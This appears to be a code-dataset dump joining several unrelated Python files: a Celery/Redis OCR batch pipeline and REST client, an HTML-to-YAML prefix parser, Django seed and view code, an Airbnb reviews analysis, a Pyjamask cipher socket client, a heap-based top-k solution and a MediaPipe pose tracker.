self._restore_and_create_scratchpad(pipe)\n self.docs.append(doc)\n self.scratchpad['scratchpad']['docs'] = self.docs\n pipe.set(self.id, json.dumps(self.scratchpad))\n pipe.execute()\n break\n except WatchError:\n continue\n\n def rm_document(self, doc):\n \"\"\"Removes a document from the (unexecuted) batch.\n\n Removes a document tuple from the batch.\n\n Args:\n doc (tuple): A standard document tuple.\n\n Raises:\n NidabaInputException: The document tuple does not refer to a file.\n \"\"\"\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n\n with self.redis.pipeline() as pipe:\n while(1):\n try:\n pipe.watch(self.id)\n self._restore_and_create_scratchpad(pipe)\n self.docs.remove(list(doc))\n self.scratchpad['scratchpad']['docs'] = self.docs\n pipe.set(self.id, json.dumps(self.scratchpad))\n pipe.execute()\n break\n except WatchError:\n continue\n except ValueError:\n raise NidabaInputException('Document not part of the batch')\n\n def add_task(self, group, method, **kwargs):\n \"\"\"Add a task.\n\n Adds a ``task``, a single executable task gathering one or more input\n documents and returning a single output document, to the current tick.\n Multiple jobs are run in parallel.\n\n Args:\n group (unicode): A task group identifier\n method (unicode): A task identifier\n **kwargs: Arguments to the task\n\n Raises:\n NidabaInputException: Trying to modify executed task.\n NidabaNoSuchAlgorithmException: Invalid method given.\n \"\"\"\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n # validate that the task exists\n if group not in self.tasks:\n raise NidabaNoSuchAlgorithmException('Unknown task group {}'.format(group))\n if u'nidaba.{}.{}'.format(group, method) not in self.celery.app.tasks:\n raise NidabaNoSuchAlgorithmException('Unknown task {} {}'.format(group, method))\n task = self.celery.app.tasks[u'nidaba.{}.{}'.format(group, method)]\n # validate arguments first against getcallargs\n try:\n getcallargs(task.run, ('', ''), **kwargs)\n except TypeError as e:\n raise NidabaInputException(str(e))\n # validate against arg_values field of the task\n task_arg_validator(task.get_valid_args(), **kwargs)\n with self.redis.pipeline() as pipe:\n while(1):\n try:\n pipe.watch(self.id)\n self._restore_and_create_scratchpad(pipe)\n self.tasks[group].append((method, kwargs))\n self.scratchpad['scratchpad']['simple_tasks'] = self.tasks\n pipe.set(self.id, json.dumps(self.scratchpad))\n pipe.execute()\n break\n except WatchError:\n continue\n\n def rm_task(self, group, method, **kwargs):\n \"\"\"Removes a task from the (unexecuted) batch.\n\n Removes a task from the batch.\n\n Args:\n group (unicode): A task group identifier\n method (unicode): A task identifier\n **kwargs: Arguments to the task\n\n Raises:\n NidabaInputException: Trying to modify executed task.\n NidabaNoSuchAlgorithmException: Invalid method given.\n \"\"\"\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n # validate that the task exists\n if group not in self.tasks:\n raise NidabaNoSuchAlgorithmException('Unknown task group {}'.format(group))\n if u'nidaba.{}.{}'.format(group, method) not in self.celery.app.tasks:\n raise NidabaNoSuchAlgorithmException('Unknown task {} {}'.format(group, method))\n task = self.celery.app.tasks[u'nidaba.{}.{}'.format(group, method)]\n with self.redis.pipeline() as pipe:\n while(1):\n try:\n pipe.watch(self.id)\n self._restore_and_create_scratchpad(pipe)\n self.tasks[group].remove([method, 
kwargs])\n self.scratchpad['scratchpad']['simple_tasks'] = self.tasks\n pipe.set(self.id, json.dumps(self.scratchpad))\n pipe.execute()\n break\n except WatchError:\n continue\n except ValueError:\n raise NidabaInputException('Task not part of the batch')\n\n def run(self):\n \"\"\"Executes the current batch definition.\n\n Expands the current batch definition to a series of celery chains and\n executes them asynchronously. Additionally a batch record is written to\n the celery result backend.\n\n Returns:\n (unicode): Batch identifier.\n \"\"\"\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n\n # resync batch before execution\n with self.redis.pipeline() as pipe:\n while(1):\n try:\n pipe.watch(self.id)\n self._restore_and_create_scratchpad(pipe)\n\n # reorder task definitions\n keys = ['img', 'binarize', 'segmentation', 'ocr', 'stats', 'postprocessing', 'output', 'archive']\n tasks = OrderedDict((key, self.tasks[key]) for key in keys)\n first = []\n prev = None\n result_data = {}\n self.lock = True\n \n # build chain\n root_docs = sorted(self.docs, key=lambda x: x[1])\n prev = []\n for group, step in tasks.iteritems():\n # skip groups without tasks\n if not step:\n continue\n sequential = True if self.order[group][0] == 'sequence' else False\n mmode = self.order[group][1]\n \n def _repeat(lst, n):\n return list(itertools.chain.from_iterable(itertools.repeat(x, n) for x in lst))\n \n if sequential:\n step = [step]\n # multiply number of tasks in this step by number of tasks in\n # previous step if not merging\n if not mmode:\n step = _repeat(step, len(root_docs))\n root_docs = root_docs * (len(step) / len(root_docs))\n # by number of root docs if doc merging\n elif mmode == 'doc':\n step = _repeat(step, len(self.docs))\n root_docs = self.docs\n else:\n root_docs = [root_docs] * len(step)\n if not sequential:\n step = [[x] for x in step]\n nprev = []\n r = []\n for rd_idx, (rdoc, c) in enumerate(zip(root_docs, step)):\n if sequential:\n r.append([])\n for idx, (fun, kwargs) in enumerate(c):\n # if idx > 0 (sequential == true) parent is previous task in sequence\n if idx > 0:\n parents = [task_id]\n # if merge mode is 'doc' base parents are tasks n * (len(prev)/len(docs)) to n+1 ...\n elif mmode == 'doc':\n parents = prev[rd_idx::len(root_docs)]\n # if merging everything all tasks in previous step are parents\n elif mmode:\n parents = prev\n # if not merging a single task in previous step is the parent\n elif mmode is False:\n parents = [prev[rd_idx % len(prev)]] if prev else prev\n task_id = uuid.uuid4().get_hex()\n # last task in a sequence is entered into new prev array\n if idx + 1 == len(c):\n nprev.append(task_id)\n result_data[task_id] = {'children': [],\n 'parents': parents,\n 'root_documents': rdoc if mmode else [rdoc],\n 'state': 'PENDING',\n 'result': None,\n 'task': (group, fun, kwargs)}\n for parent in parents:\n result_data[parent]['children'].append(task_id)\n task = self.celery.app.tasks[u'nidaba.{}.{}'.format(group, fun)]\n if sequential:\n r[-1].append(task.s(batch_id=self.id, task_id=task_id, **kwargs))\n else:\n r.append(task.s(batch_id=self.id, task_id=task_id, **kwargs))\n prev = nprev\n t = self.celery.app.tasks[u'nidaba.util.barrier'].s(merging=mmode, sequential=sequential, replace=r, root_docs=self.docs)\n first.append(t)\n\n pipe.set(self.id, json.dumps(result_data))\n chain(first).apply_async(args=[self.docs])\n break\n except WatchError:\n continue\n return self.id\n\n\nclass NetworkSimpleBatch(object):\n \"\"\"\n A SimpleBatch 
object providing the same interface as a SimpleBatch.\n\n It does some basic error checking to minimize network traffic but it won't\n catch all errors before issuing API requests, especially if the batch is\n modified by another process. In these cases exceptions will be raised by\n the ``requests`` module.\n \"\"\"\n def __init__(self, host, id=None):\n self.id = id\n self.host = host\n self.lock = False\n self.allowed_tasks = {}\n if id is not None:\n r = requests.get('{}/batch/{}'.format(host, id))\n r.raise_for_status()\n\n def create_batch(self):\n \"\"\"\n Creates a batch on the server. Also synchronizes the list of available\n tasks and their parameters.\n \"\"\"\n if self.id is not None:\n raise NidabaInputException('SimpleBatch object already initialized')\n r = requests.post('{}/batch'.format(self.host))\n r.raise_for_status()\n self.id = r.json()['id']\n self.lock = False\n self.get_available_tasks()\n return self.id\n\n def get_available_tasks(self):\n \"\"\"\n Synchronizes the local task/parameter list with the remote server.\n \"\"\"\n r = requests.get('{}/tasks'.format(self.host))\n r.raise_for_status()\n self.allowed_tasks = r.json()\n\n def is_running(self):\n \"\"\"\n Returns True if the batch's run() method has been successfully called, otherwise False.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n r = requests.get('{}/batch/{}'.format(self.host, self.id))\n r.raise_for_status()\n self.lock = True\n if r.json():\n self.lock = True\n return True\n else:\n self.lock = False\n return False\n\n def get_state(self):\n \"\"\"\n Retrieves the current state of a batch.\n\n Returns:\n (unicode): A string containing one of the following states:\n\n NONE: The batch ID is not registered in the backend.\n FAILURE: Batch execution has failed.\n PENDING: The batch is currently running.\n SUCCESS: The batch has completed successfully.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n r = requests.get('{}/batch/{}'.format(self.host, self.id))\n r.raise_for_status()\n batch = r.json()\n if 'scratchpad' in batch:\n return u'NONE'\n elif 'chains' in batch:\n self.lock = True\n batch = batch['chains']\n st = u'SUCCESS'\n for subtask in batch.itervalues():\n if subtask['state'] == 'PENDING' or subtask['state'] == 'RUNNING':\n st = u'PENDING'\n if subtask['state'] == 'FAILURE':\n return u'FAILURE'\n return st\n else:\n return u'NONE'\n\n def get_extended_state(self):\n \"\"\"\n Returns the extended batch state.\n\n Raises:\n NidabaInputException if the batch hasn't been executed yet.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n r = requests.get('{}/batch/{}'.format(self.host, self.id))\n r.raise_for_status()\n if 'chains' in r.json():\n self.lock = True\n return r.json()['chains']\n\n def get_results(self):\n \"\"\"\n Retrieves the storage tuples of a successful batch.\n\n Returns:\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n r = requests.get('{}/batch/{}'.format(self.host, self.id))\n r.raise_for_status()\n if 'chains' in r.json():\n self.lock = True\n batch = r.json()['chains']\n outfiles = []\n for subtask in batch.itervalues():\n if len(subtask['children']) == 0 and subtask['result'] is not None:\n outfiles.append((subtask['result'], subtask['root_documents']))\n return outfiles\n else:\n return None\n\n def get_tasks(self):\n \"\"\"\n Returns the task tree either from the scratchpad or from the pipeline\n when 
already in execution.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n r = requests.get('{}/batch/{}/tasks'.format(self.host, self.id))\n r.raise_for_status()\n return r.json()\n\n def get_documents(self):\n \"\"\"\n Returns the list of input document for this task.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n r = requests.get('{}/batch/{}/pages'.format(self.host, self.id))\n r.raise_for_status()\n return r.json()\n\n def add_document(self, path, callback, auxiliary=False):\n \"\"\"\n Add a document to the batch.\n\n Uploads a document to the API server and adds it to the batch.\n\n ..note::\n Note that this function accepts a standard file system path and NOT\n a storage tuple as a client using the web API is not expected to\n keep a separate, local storage medium.\n\n Args:\n path (unicode): Path to the document\n callback (function): A function that is called with a\n ``requests_toolbelt.multipart.encoder.MultipartEncoderMonitor``\n instance.\n auxiliary (bool): Switch to disable setting the file as an input\n document. May be used to upload ground truths,\n metadata, and other ancillary files..\n\n Raises:\n NidabaInputException: The document does not refer to a file or the\n batch is locked because the run() method has\n been called.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n if auxiliary:\n params = {'auxiliary': True}\n else:\n params = {}\n m = encoder.MultipartEncoderMonitor.from_fields(\n fields={'scans': (os.path.basename(path), open(path, 'rb'))},\n callback=callback)\n r = requests.post('{}/batch/{}/pages'.format(self.host, self.id),\n data=m, headers={'Content-Type': m.content_type},\n params=params)\n r.raise_for_status()\n return r.json()[0]['url']\n\n def rm_document(self, path):\n \"\"\"\n Removes a document from the batch.\n\n ..note::\n Note that this function accepts a standard file system path and NOT\n a storage tuple as a client using the web API is not expected to\n keep a separate, local storage medium.\n\n Args:\n path (unicode): Path to the document\n\n Raises:\n NidabaInputException: The document does not refer to a file or the\n batch is locked because the run() method has\n been called.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n r = requests.delete('{}/batch/{}/pages'.format(self.host, self.id),\n json={'scans': [path]})\n r.raise_for_status()\n\n def add_task(self, group, method, *args, **kwargs):\n \"\"\"\n Add a particular task configuration to a task group.\n\n Args:\n group (unicode): Group the task belongs to\n method (unicode): Name of the task\n kwargs: Arguments to the task\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n # validate that the task exists\n if group not in self.allowed_tasks or method not in self.allowed_tasks[group]:\n raise NidabaInputException('Unknown task {}'.format(method))\n r = requests.post('{}/batch/{}/tasks/{}/{}'.format(self.host, self.id,\n group, method),\n json=kwargs)\n r.raise_for_status()\n\n def rm_task(self, group, method, *args, **kwargs):\n \"\"\"\n Removes a particular task configuration from the batch.\n\n Args:\n group (unicode): Group the task 
belongs to\n method (unicode): Name of the task\n kwargs: Arguments to the task\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n # validate that the task exists\n if group not in self.allowed_tasks or method not in self.allowed_tasks[group]:\n raise NidabaInputException('Unknown task {}'.format(method))\n r = requests.delete('{}/batch/{}/tasks/{}/{}'.format(self.host, self.id,\n group, method),\n json=kwargs)\n r.raise_for_status()\n\n def run(self):\n \"\"\"\n Executes the current batch definition.\n\n Expands the current batch definition to a series of celery chains and\n executes them asynchronously. Additionally a batch record is written to\n the celery result backend.\n\n Returns:\n (unicode): Batch identifier.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n if self.lock:\n raise NidabaInputException('Executed batch may not be reexecuted')\n r = requests.post('{}/batch/{}'.format(self.host, self.id))\n r.raise_for_status()\n return self.id\n","repo_name":"OpenPhilology/nidaba","sub_path":"nidaba/nidaba.py","file_name":"nidaba.py","file_ext":"py","file_size_in_byte":32138,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"27"} +{"seq_id":"2132447108","text":"import pandas as pd\nimport sys\nimport getopt\nimport yaml\n\n# Arguments\nif len(sys.argv) != 2:\n print('Usage parsehtml.py ')\n sys.exit()\n\ninputfile = sys.argv[1]\n\nif not inputfile.endswith('.html'):\n print('Input file needs to be .html. Found : {}'.format(inputfile))\n sys.exit()\n\n# Main\ninfile=open(inputfile, \"r+\")\n\ntables = pd.read_html(infile, match='Prefix')\n\nfor table in tables:\n #print(table)\n prefixes = table[\"Prefix\"]\n\n if ':' in prefixes[0]:\n # IPv6\n print('Skipping ipv6 table')\n continue\n if not '.' 
in prefixes[0]:\n print('Skipping unknown table')\n continue\n\n # IPv4\n outputfile = inputfile.replace('.html', '.yml')\n print('Writing to {}'.format(outputfile))\n with open(outputfile, 'w') as outfile:\n outfile.write(yaml.dump(prefixes.tolist()))\n \n","repo_name":"TokyoQ/techedits","sub_path":"parsehtml/parsehtml.py","file_name":"parsehtml.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20491282743","text":"from django.core.management.base import BaseCommand\nfrom rooms.models import HouseRule\n\n\nclass Command(BaseCommand):\n\n help = \"This command creates House rules!\"\n\n def handle(self, *args, **options):\n houserules = [\n \"Suitable for events\",\n \"Pets allowed\",\n \"Smoking allowed\",\n ]\n for h in houserules:\n HouseRule.objects.create(name=h)\n self.stdout.write(self.style.SUCCESS(f\"{len(houserules)} House Rules Created!\"))\n","repo_name":"cande0/airbnb-clone","sub_path":"rooms/management/commands/seed_houserules.py","file_name":"seed_houserules.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42090185744","text":"from functools import reduce\n\n\nclass Human:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n\nclass Cinderella(Human):\n __count = 0\n\n def __init__(self, name, age, leg_size):\n super().__init__(name, age)\n self.leg_size = leg_size\n Cinderella.__count += 1\n\n def __str__(self):\n return f\"Name: {self.name}\\nAge: {self.age}\\nShoe size: {self.leg_size}\"\n\n @classmethod\n def count(cls):\n return cls.__count\n\n\nclass Prince(Human):\n def __init__(self, name, age, leg_size):\n super().__init__(name, age)\n self.leg_size = leg_size\n\n def find(self, array):\n for cin in array:\n if self.leg_size == cin.leg_size:\n return cin\n\n\nclass Notebook:\n __notes = []\n\n def notes_decorator(func):\n # plain function (not a classmethod) so it is callable as a decorator\n # inside the class body; it opens the notes file around each call\n def inner(cls, *args, **kwargs):\n with open('notes.txt', 'a+') as note:\n return func(cls, note, *args, **kwargs)\n return inner\n\n @classmethod\n @notes_decorator\n def append(cls, note, value):\n note.write(f\"{value['name']},{value['cost']}\\n\")\n cls.__notes.append(value)\n\n @classmethod\n def to_dict(cls, obj):\n # copy only instance attributes, then record the class name for to_obj\n temp_dict = dict(vars(obj))\n temp_dict['type'] = type(obj).__name__\n return temp_dict\n\n @classmethod\n def to_obj(cls, dit):\n if dit['type'] == 'Human':\n return Human(dit['name'], dit['age'])\n elif dit['type'] == 'Cinderella':\n return Cinderella(dit['name'], dit['age'], dit['leg_size'])\n elif dit['type'] == 'Prince':\n return Prince(dit['name'], dit['age'], dit['leg_size'])\n\n @classmethod\n def create(cls):\n name = input(\"Enter the product name: \")\n cost = int(input(\"Enter the product price: \"))\n cls.append({'name': name, \"cost\": cost})\n\n @classmethod\n def all_notes(cls):\n for note in cls.__notes:\n print(f\"{note['name']}\\n Price: {note['cost']}\")\n\n @classmethod\n def all_cost(cls):\n return reduce(lambda a, b: a + b['cost'], cls.__notes, 0)\n\n @classmethod\n def max_cost(cls):\n temp = 0\n for note in cls.__notes:\n if temp < note['cost']:\n temp = note['cost']\n return temp\n\n @classmethod\n def find(cls):\n temp = input(\"Enter the product to search for: \")\n for note in cls.__notes:\n if temp == note['name']:\n return f\"{note['name']}\\nPrice: {note['cost']}\"
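\n\n# Usage sketch (illustrative only; the sample values below are invented):\n# c = Cinderella('Ella', 19, 36)\n# Notebook.to_dict(c) # -> {'name': 'Ella', 'age': 19, 'leg_size': 36, 'type': 'Cinderella'}\n# Notebook.to_obj(Notebook.to_dict(c)) # -> an equivalent Cinderella instance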
f\"{note['name']}\\nЦена: {note['cost']}\"\n\n\nwhile True:\n print(\"1. Создать запись\")\n print(\"2. Список всех записей\")\n print(\"3. Общая сума всех покупок\")\n print(\"4. Самая до��огая покупка\")\n print(\"5. Поиск по названию покупки\")\n print(\"6. Виход\")\n ans = input(\"Виберите действие: \")\n if ans == '1':\n Notebook.create()\n elif ans == '2':\n Notebook.all_notes()\n elif ans == '3':\n print(Notebook.all_cost())\n elif ans == '4':\n print(Notebook.max_cost())\n elif ans == '5':\n print(Notebook.find())\n elif ans == '6':\n break\n else:\n print(\"ВЫБЕРИТЕ ИЗ МЕНЮ!\")\n","repo_name":"Rufused/Python","sub_path":"hw5.py","file_name":"hw5.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13234402494","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 30 19:05:42 2023\n\n@author: ivan_\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Lee el archivo CSV\nmainpath = \"C:/Users/ivan_/Documents/Escuela/8vo/Ciencia de datos/\"\nfilename_airbnb = \"airbnb_completo.csv\"\nfilename_reviews = \"reviews.csv\"\n\n# Lee los archivos CSV\ndf_airbnb = pd.read_csv(mainpath + filename_airbnb)\ndf_reviews = pd.read_csv(mainpath + filename_reviews)\n\n# Fusiona los DataFrames por el listing_id\ndf_merged = pd.merge(df_airbnb, df_reviews, on='listing_id')\n\n# Convierte la columna \"date\" en formato de fecha\ndf_merged['date'] = pd.to_datetime(df_merged['date'])\n\n# Obtén el rango de fechas\nfecha_min = df_merged['date'].min().date()\nfecha_max = df_merged['date'].max().date()\n\n# Cuenta el número total de reviews\nnum_reviews_total = df_merged.shape[0]\n\n# Cuenta el número de reviewer_id sin contar repetidos\nnum_reviewers = df_merged['reviewer_id'].nunique()\n\n# Agrupa los datos por ciudad, año y cuenta la cantidad de reviews\ndf_grouped = df_merged.groupby(['city', df_merged['date'].dt.year]).size().reset_index(name='review_count')\n\n# Grafica la actividad de las reviews por ciudad durante el tiempo\nfig, ax = plt.subplots(figsize=(12, 6))\n\n# Recorre las ciudades y grafica una línea para cada una\nfor city in df_grouped['city'].unique():\n df_city = df_grouped[df_grouped['city'] == city]\n ax.plot(df_city['date'], df_city['review_count'], label=city)\n\n# Personaliza el gráfico\nax.set_xlabel('Año')\nax.set_ylabel('Cantidad de Reviews')\nax.set_title('Actividad de Reviews por Ciudad')\nax.legend()\n\n# Imprime el rango de fechas, el número total de reviews y el número de reviewers\nprint(\"Rango de fechas:\", fecha_min, \"a\", fecha_max)\nprint(\"Número total de reviews:\", num_reviews_total)\nprint(\"Número de reviewers únicos:\", num_reviewers)\n\n# Muestra el gráfico\nplt.show()\n\n# Reorganiza los datos con pivot\ndf_pivot = df_grouped.pivot(index='city', columns='date', values='review_count')\n\n# Restablece el índice del DataFrame df_pivot\ndf_pivot = df_pivot.reset_index()\n\n# Guarda el DataFrame df_pivot en un nuevo archivo CSV\noutput_filename = \"reviews_actividad_ciudades.csv\"\ndf_pivot.to_csv(output_filename, index=False)","repo_name":"VmasterpartV/airbnb_data","sub_path":"reviews_per_year.py","file_name":"reviews_per_year.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39752449392","text":"import socket\nhost = socket.gethostname() #getting host\nport = 6518\nprint(\"Enter number: \\n1 for Pyjamask-128 encryption\\n2 for 
Pyjamask-128 decryption\\n\")\nx=input()\n#creating the socket and connecting to host,port\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host, port))\nprint(\"\\nConnecting to the server \\n\")\ns.send(bytes(x,'utf-8'))\nif x==\"1\":\n \n print(\"Connected with Pyjamask-128 Encryption Server\\n\")\n print(\"Enter the message to be encrypted:\\n\")\n inp_msg=input()\n s.send(bytes(inp_msg,'utf-8'))\n print(\"\\nEnter the secret key(32 hex values only):\")\n secret_key=input()\n s.send(bytes(secret_key,'utf-8'))\n cipher_text=s.recv(1024).decode()\n print(cipher_text,\"\\n\")\n s.close()\n\nif x==\"2\":\n print(\"Connected with Pyjamask-128 Decryption Server\\n\")\n print(\"Enter the ciphertext to be decrypted:\\n\")\n cip_msg=input()\n s.send(bytes(cip_msg,'utf-8'))\n print(\"\\nEnter the secret key(32 hex values only):\")\n secret_key=input()\n s.send(bytes(secret_key,'utf-8'))\n plain_text=s.recv(1024).decode()\n print(plain_text)\n s.close()\n","repo_name":"Tarunvetsa/Pyjamask128-Client_Server","sub_path":"Pyjamask-128_Encryption&Decryption/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"71453167111","text":"\"\"\"\nhttps://leetcode.com/problems/top-k-frequent-elements/\n\nGiven a non-empty array of integers, return the k most frequent elements.\n\nExample 1:\n\nInput: nums = [1,1,1,2,2,3], k = 2\nOutput: [1,2]\nExample 2:\n\nInput: nums = [1], k = 1\nOutput: [1]\nNote:\n\nYou may assume k is always valid, 1 ≤ k ≤ number of unique elements.\nYour algorithm's time complexity must be better than O(n log n), where n is the array's size.\nIt's guaranteed that the answer is unique, in other words the set of the top k frequent elements is unique.\nYou can return the answer in any order.\n\"\"\"\n\nimport heapq\nfrom typing import List\n\n\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n frequency = {}\n for num in nums:\n frequency[num] = frequency.get(num, 0) + 1\n\n heap = []\n keys = list(frequency.keys())\n i = 0\n while i < k:\n heap.append((frequency[keys[i]], keys[i]))\n # heapq.heappush(heap, (frequency[keys[i]], keys[i]))\n i += 1\n\n heapq.heapify(heap)\n\n while i < len(keys):\n if heap[0][0] < frequency[keys[i]]:\n heapq.heappop(heap)\n heapq.heappush(heap, (frequency[keys[i]], keys[i]))\n i += 1\n\n return [ele[1] for ele in heap]\n\n\nif __name__ == '__main__':\n nums = [1, 1, 1, 2, 2, 3]\n k = 2\n print(Solution(). 
topKFrequent(nums, k))\n","repo_name":"emptybename/Ds-Algo","sub_path":"heap/problems/k_most_frequent_elements.py","file_name":"k_most_frequent_elements.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17904890784","text":"import cv2 as cv\nimport mediapipe as mp\nimport time\nimport copy\nimport numpy as np\n\nclass VideoProcessor():\n\n def __init__(self) -> None:\n # Camera and frame\n self.cam = cv.VideoCapture(0)\n self.cur_frame = None\n\n # Pose detection\n self.mp_pose = mp.solutions.pose\n self.mp_draw = mp.solutions.drawing_utils\n self.pose = self.mp_pose.Pose()\n\n # FPS Information\n self.cur_time = None\n self.prev_time = 0 \n \n def show_fps(self, frame):\n self.cur_time = time.time()\n fps = int(1/(self.cur_time - self.prev_time))\n self.prev_time = self.cur_time\n return cv.putText(frame, 'FPS:' + str(fps), (70,80), cv.FONT_HERSHEY_PLAIN, 3, (255,0,0), thickness=10)\n\n def close(self):\n self.cam.release()\n cv.destroyAllWindows()\n\n def split_frame_into_2(self, frame):\n height, width, channels = frame.shape\n\n # Right Half - left side is blacked out\n r = copy.deepcopy(frame)\n r[:, 0:width//2] = np.zeros(shape=(height, width//2, channels))\n\n # Left Half - right side is blacked out\n frame[:, width//2:] = np.zeros(shape=(height, width//2, channels))\n \n return frame, r\n\n def break_frame_into_2(self, frame):\n h,w,c = frame.shape\n left = frame[:,0:w//2]\n right = frame[:,w//2:]\n return left, right\n \n def stitch_left_and_right(self, left, right):\n h,w,c = left.shape\n left[:, w//2:] = right[:, w//2:]\n cv.line(left, pt1=(w//2,0), pt2=(w//2,h), color=(255,255,255), thickness=100)\n return left\n \n def draw_nose_line(self, frame, coord, side):\n if coord:\n x,y = coord\n if side == 'left':\n color = (255,0,0)\n else:\n color = (0,0,255)\n frame = cv.line(frame, pt1 = (x-20, y), pt2=(x+20, y), color=color, thickness=4)\n return frame\n \n def get_nose_coord(self, frame):\n frame_width = frame.shape[1]\n frame_height = frame.shape[0]\n frame = cv.cvtColor(frame, cv.COLOR_BGR2RGB)\n\n # Get the Pose Landmarks\n results = self.pose.process(frame)\n if results.pose_landmarks:\n self.mp_draw.draw_landmarks(frame, results.pose_landmarks, self.mp_pose.POSE_CONNECTIONS)\n\n # Nose Y is the Y coordinate of your nose in the frame\n nose_y = int(results.pose_landmarks.landmark[self.mp_pose.PoseLandmark.NOSE].y * frame_height)\n nose_x = int(results.pose_landmarks.landmark[self.mp_pose.PoseLandmark.NOSE].x * frame_width)\n else:\n return None\n\n return (nose_x, nose_y)\n \n def get_Y_coords(self, show_video = False):\n ret, frame = self.cam.read()\n if not ret: return None\n \n h,w,c = frame.shape\n frame = cv.flip(frame, 1)\n\n frame = self.show_fps(frame)\n\n # Break frame into 2 halves\n left, right = self.break_frame_into_2(frame)\n\n # Get poses for both halves\n left_nose_coord = self.get_nose_coord(left)\n right_nose_coord = self.get_nose_coord(right)\n\n left = self.draw_nose_line(left, left_nose_coord, 'left')\n right = self.draw_nose_line(right, right_nose_coord, 'right')\n\n frame = np.concatenate((left,right),axis=1)\n\n self.cur_frame = frame\n\n # EXTRA: Modify right coord to so that its in the right place in the bigger frame\n # right_nose_coord[0] += w//2\n\n if show_video:\n cv.imshow(\"Video Feed\", frame)\n \n ret = tuple()\n \n return (left_nose_coord[1] if left_nose_coord else None\n , right_nose_coord[1] if right_nose_coord else None)\n\n 
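# Illustrative usage (hypothetical driver code, not from the original file):\n # vp = VideoProcessor()\n # ys = vp.get_Y_coords(show_video=True) # (left_y, right_y) nose heights in pixels; a side is None when no pose is found, and ys is None if the camera read fails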
\n\n\n\nif __name__ == '__main__':\n vp = VideoProcessor()\n\n while True:\n ret, frame = vp.cam.read()\n \n if not ret: continue\n\n h,w,c = frame.shape\n frame = cv.flip(frame, 1)\n\n frame = vp.show_fps(frame)\n\n # Split frame into 2 halves\n # left, right = vp.split_frame_into_2(frame)\n \n left, right = vp.break_frame_into_2(frame)\n\n # # # Get poses for both halves\n left_nose_coord = vp.get_nose_coord(left)\n right_nose_coord = vp.get_nose_coord(right)\n\n # # if left_nose_coord:\n # # print('Left Nose', left_nose_coord[1], ' ------ ', end='')\n # # if right_nose_coord:\n # # print('Right Nose', right_nose_coord[1], end='')\n # # print()\n\n left = vp.draw_nose_line(left, left_nose_coord, 'left')\n right = vp.draw_nose_line(right, right_nose_coord, 'right')\n\n frame = np.concatenate((left,right),axis=1)\n\n cv.imshow(\"Video Feed\", frame)\n\n if cv.waitKey(33) == ord('q'):\n break\n\n vp.close()","repo_name":"bluepra/PongVision","sub_path":"unused_code/BodyVideoProcessor.py","file_name":"BodyVideoProcessor.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"35021952507","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Evento, FotoEvento\nfrom centro_memoria.instituicao.models import Instituicao\n\ndef eventos(request):\n instituicao = get_object_or_404(Instituicao)\n eventos = Evento.objects.all().filter(ativo=True).order_by('-criado_em')\n fotos_eventos_destaque = FotoEvento.objects.all().filter(evento__in=eventos, destaque=True)\n template_name = 'eventos.html'\n context = {\n 'eventos': eventos,\n 'fotos_eventos_destaque': fotos_eventos_destaque,\n 'instituicao': instituicao\n }\n return render(request, template_name, context)\n\ndef evento_detalhes(request, titulo):\n instituicao = get_object_or_404(Instituicao)\n evento = get_object_or_404(Evento, nome__iexact=titulo)\n foto_evento = FotoEvento.objects.all().filter(evento=evento, destaque=True)\n\n outros_eventos = Evento.objects.all().filter(ativo=True, destaque=True).exclude(pk=evento.pk).order_by('-criado_em')\n if len(outros_eventos) > 0:\n outros_eventos = outros_eventos[:6]\n fotos_outros_eventos = FotoEvento.objects.all().filter(evento__in=outros_eventos, destaque=True)\n\n template_name = 'evento_detalhes.html'\n context = {\n 'evento': evento,\n 'foto_evento': foto_evento,\n 'instituicao': instituicao,\n 'outros_eventos': outros_eventos,\n 'fotos_outros_eventos': fotos_outros_eventos\n }\n return render(request, template_name, 